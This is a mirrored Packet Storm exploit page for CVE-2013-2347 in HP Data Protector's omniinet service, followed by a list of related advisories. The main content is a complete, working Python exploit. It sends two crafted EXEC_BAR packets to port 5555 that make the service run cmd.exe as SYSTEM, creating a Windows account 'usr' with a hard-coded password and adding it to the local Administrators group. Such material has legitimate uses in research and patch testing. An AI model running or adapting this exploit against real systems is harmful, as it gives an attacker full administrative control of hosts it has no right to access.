Lucene search
Chris GrahamPACKETSTORM:125246HistoryFeb 17, 2014 - 12:00 a.m.
HP Data Protector EXEC_BAR Remote Command Execution
2014-02-1700:00:00
Chris Graham
packetstormsecurity.com
26
0.467 Medium
EPSS
Percentile
97.1%
`import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omniinet service is
running as SYSTEM. This allows for complete compromise of the remote
host.
To exploit this vulnerability, you only need to send two specific arguments.
Omniinet has an argument parser that will extract these out and
eventually pass them to a call to CreateProcessW via the lpCommandLine
parameter.
When a packet is sent to the omniinet service, it will check the opcode
and look up an associated function to call based on the opcode in a table
of function pointers. The function to handle EXEC_BAR packets requires that
the packet contain at least 19 arguments. The 18th argument will be the
command we want to execute, and the 19th will be an argument we can pass to
the command we are executing. This exploit will create a new windows account
and add it to the local Administrators group. This means that lpCommandLine
that gets passed to CreateProcess will need to look like:
'c:\windows\system32\cmd.exe' '/c net user usr p@ss!23 /add'
and
'c:\windows\system32\cmd.exe' '/c net localgroup Administrators usr /add'
Note: The 19th value has size constraints so it needs to be as short of a
string as possible.
"""
exec_bar_add_user = \
"\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x75\x00\x73\x00" + \
"\x72\x00\x20\x00\x70\x00\x40\x00\x73\x00\x73\x00\x21\x00\x32\x00" + \
"\x33\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
exec_bar_make_admin = \
"\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00" + \
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00" + \
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00" + \
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00" + \
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00" + \
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00" + \
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00" + \
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00" + \
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00" + \
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00" + \
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00" + \
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00" + \
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00" + \
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00" + \
"\x72\x00\x73\x00\x20\x00\x75\x00\x73\x00\x72\x00\x20\x00\x2f\x00" + \
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00"
def connect_target(target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as err:
print "[-]ERROR CREATING SOCKET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
try:
sock.connect((target, port))
except socket.error as err:
print "[-]ERROR CONNECTING TO TARGET! CODE: %d MSG: %s" % (err[0], err[1])
return -1
return sock
def send_recv_packet(sock, packet):
sock.sendall(packet)
res = sock.recv(4096)
return res
cmdline_parser = argparse.ArgumentParser(description='HP Data Protector EXEC_BAR Remote Command Execution')
cmdline_parser.add_argument('-t', dest='ip', help='Target host ip', required=True)
cmdline_parser.add_argument('-p', dest='port', help='Target port', default=5555, type=int, required=False)
args = cmdline_parser.parse_args()
print "\n[*]ATTEMPING TO ADD WINDOWS ADMINISTRATOR ACCOUNT usr WITH PASSWORD p@ss!23"
for packet in [exec_bar_add_user, exec_bar_make_admin]:
target = connect_target(args.ip, args.port)
if target == -1: exit()
data = send_recv_packet(target, packet)
print "[*]SERVER RESPONSE: " + \
data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$")
target.close()
`
Related
packetstorm
packetstorm
HP Data Protector Backup Client Service Remote Code Execution
2014-03-06 00:00:00
prion
prion
Design/Logic Flaw
2014-01-04 04:51:00
saint
saint
HP Data Protector Backup Client Service EXEC_BAR Packet Vulnerability
2014-03-21 00:00:00
HP Data Protector Backup Client Service EXEC_BAR Packet Vulnerability
2014-03-21 00:00:00
HP Data Protector Backup Client Service EXEC_BAR Packet Vulnerability
2014-03-21 00:00:00
zdt
zdt
HP Data Protector Backup Client Service Remote Code Execution
2014-03-06 00:00:00
HP Data Protector Backup Client Service Remote Code Execution Exploit
2014-03-10 00:00:00
exploitpack
exploitpack
HP Data Protector - EXEC_BAR Remote Command Execution
2014-02-16 00:00:00
zdi
zdi
cvelist
cvelist
CVE-2013-2347
2014-01-04 02:00:00
checkpoint_advisories
checkpoint_advisories
HP Data Protector EXEC_BAR Command Execution (CVE-2013-2347)
2014-03-12 00:00:00
seebug
seebug
HP Data Protector EXEC_BAR Remote Command Execution
2014-07-01 00:00:00
HP Storage Data Protectorๅคไธชๅฎๅ
จๆผๆด
2014-01-06 00:00:00
cve
cve
CVE-2013-2347
2014-01-04 04:51:00
exploitdb
exploitdb
HP Data Protector - 'EXEC_BAR' Remote Command Execution
2014-02-16 00:00:00
nessus
nessus
HP Data Protector Multiple Vulnerabilities (HPSBMU02895 SSRT101253)
2014-01-06 00:00:00
HP-UX PHSS_43889 : s700_800 11.X OV DP7.00 HP-UX IA/PA - Cell Server patch
2014-04-27 00:00:00
HP-UX PHSS_43890 : s700_800 11.X OV DP7.00 HP-UX IA/PA - Core patch
2014-04-27 00:00:00
securityvulns
securityvulns
openvas
openvas
HP (OpenView Storage) Data Protector Multiple Vulnerabilities
2014-02-18 00:00:00